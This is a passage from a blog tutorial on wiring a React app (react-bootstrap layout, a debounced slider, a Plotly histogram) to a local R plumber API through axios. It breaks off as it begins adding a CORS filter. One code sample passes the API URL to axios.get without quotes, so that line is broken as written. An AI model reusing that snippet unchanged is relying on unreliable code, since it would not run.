&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; App &lt;span style="color:#ff7b72"&gt;extends&lt;/span&gt; React.Component {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; constructor(props) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;super&lt;/span&gt;(props)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange.bind(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What is binding for? In JavaScript the following two snippets are not equivalent:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JS" data-lang="JS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;obj.method();
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JS" data-lang="JS"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; method &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; obj.method;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;method();
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Binding ensures that the second snippet has the same behaviour as the first one. With React we need to bind the methods that we pass into other components.&lt;/p&gt;
&lt;h3 id="onsliderchange"&gt;onSliderChange()&lt;/h3&gt;
&lt;p&gt;The onSliderChange function makes a get request to the our {plumber} API (http://localhost:8000/hist-raw) using axios, we send it a &lt;code&gt;params&lt;/code&gt; object containing a number of &lt;code&gt;bins&lt;/code&gt; and it sends us back some histogram data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; onSliderChange(input) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; axios.get(http&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;//localhost:8000/hist-raw,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; input,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }).then((data) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.setState({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rawdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bar&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once we recieve this data we manipulate it with &lt;code&gt;map()&lt;/code&gt; functions and store the required data within a &lt;code&gt;rawdata&lt;/code&gt; object we have created. This is formatted using the data format required in the Plotly package. This object is stored using &lt;code&gt;this.SetState&lt;/code&gt; within the state of the App component.&lt;/p&gt;
&lt;h3 id="react-bootstrap-layout"&gt;react-bootstrap Layout&lt;/h3&gt;
&lt;p&gt;We have some react-bootstrap components &lt;code&gt;Container Row Col Card&lt;/code&gt; to describe the layout and design. Components can appear inside other components similar to how DOM elements can appear inside other DOM elements in HTML.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; render() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; className&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;App&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Container&lt;/span&gt; fluid&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Row&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt; md&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;}&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Title&lt;/span&gt;&amp;gt;Hello React&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Title&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Text&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;label&lt;/span&gt; for&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;col-form-label&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Number &lt;span style="color:#ff7b72"&gt;of&lt;/span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;label&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Slider&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onChange&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{debounce(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange, &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; marks&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;13&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;13&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;26&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;26&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;38&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;38&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;50&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }}/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Text&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt; md&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;}&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state.rawdata}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; layout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bargap&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; autosize&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; useResizeHandler&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; responsive&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Row&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Container&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; );
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Some of these components have properties that we can change within their opening tag. The value of the &lt;code&gt;md&lt;/code&gt; property of columns can be changed to determine the width of them. More information on the layout properties can be found &lt;a href="https://react-bootstrap.github.io/layout/grid/" rel="external"&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="slider"&gt;Slider&lt;/h3&gt;
&lt;p&gt;Within the Card.Text section we have added the slider component with properties to describe it. The part I&amp;rsquo;d like to draw attention to is the onChange property.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;Slider&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onChange&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{debounce(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange, &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; marks&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;13&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;13&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;26&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;26&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;38&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;38&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;50&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}}/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The onChange property is the function that is executed when the value of parent changes. In this case it is the Slider component.
We set the onChange property to call the bound OnSliderChange function we created previously. We also wrap the function in a lodash debounce function making use of one of our npm dependencies.&lt;/p&gt;
&lt;p&gt;The purpose of this is to reduce the amount of requests made to the API by only sending a request once the user has finished changing the value of the slider for a set amount of time. If we didn&amp;rsquo;t add this in, every tick of the slider change would trigger an HTTP request to our API. We only want to trigger one request once the slider has stopped changing for 60ms.&lt;/p&gt;
&lt;h3 id="plot"&gt;Plot&lt;/h3&gt;
&lt;p&gt;Here we have our plot again with some properties.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;Plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state.rawdata}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;layout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bargap&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; autosize&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; useResizeHandler&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; responsive&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the data property calls upon &lt;code&gt;this.state.rawdata&lt;/code&gt;. This means when the state changes of the App via the OnSliderChange function this Plot component will update with the new rawdata state. A Plotly plot also takes a layout parameters object to describe the axes and the styling of the graph.&lt;/p&gt;
&lt;h3 id="boilerplate-cleanup"&gt;Boilerplate Cleanup&lt;/h3&gt;
&lt;p&gt;We can tidy up some boilerplate files that have been generated.
Since we are using bootstrap for our css we don&amp;rsquo;t need the generated css files and can remove them.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;App.css
index.css
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;and we can remove the import line from our index.js file&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;./index.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="trying-out-the-application"&gt;Trying Out the Application&lt;/h3&gt;
&lt;p&gt;If we run both the App and the {plumber} API and visit the url for the app we will most likely see this:
&lt;img class="image-center" src="HelloReact2.png" alt="Screenshot of empty histogram axes and bins slider set to minimum." style="width:650px; class:image-center"&gt;
Unfortunately if you try the slider nothing happens, and you may have also opened the developer console to discover our requests being blocked by the CORS policy.
This is a security feature to help reduce possible CORS related attack vectors.&lt;/p&gt;
&lt;h3 id="cross-origin-resource-sharing-cors"&gt;Cross-Origin Resource Sharing (CORS)&lt;/h3&gt;
&lt;p&gt;Cross-origin resource sharing (CORS) is a browser mechanism which enables controlled access to resources located outside of a given domain.
More information on CORS &lt;a href="https://portswigger.net/web-security/cors" rel="external"&gt;can be found here&lt;/a&gt;.
JavaScript treats both our application and our API as different origins because they are running on different ports.
In order to test out our app and API locally we need to append this to our Plumber.R file in our API to include an Access-Control-Allow-Origin header with a response&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#temporary testing purposes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @filter cors&lt;/span&gt;
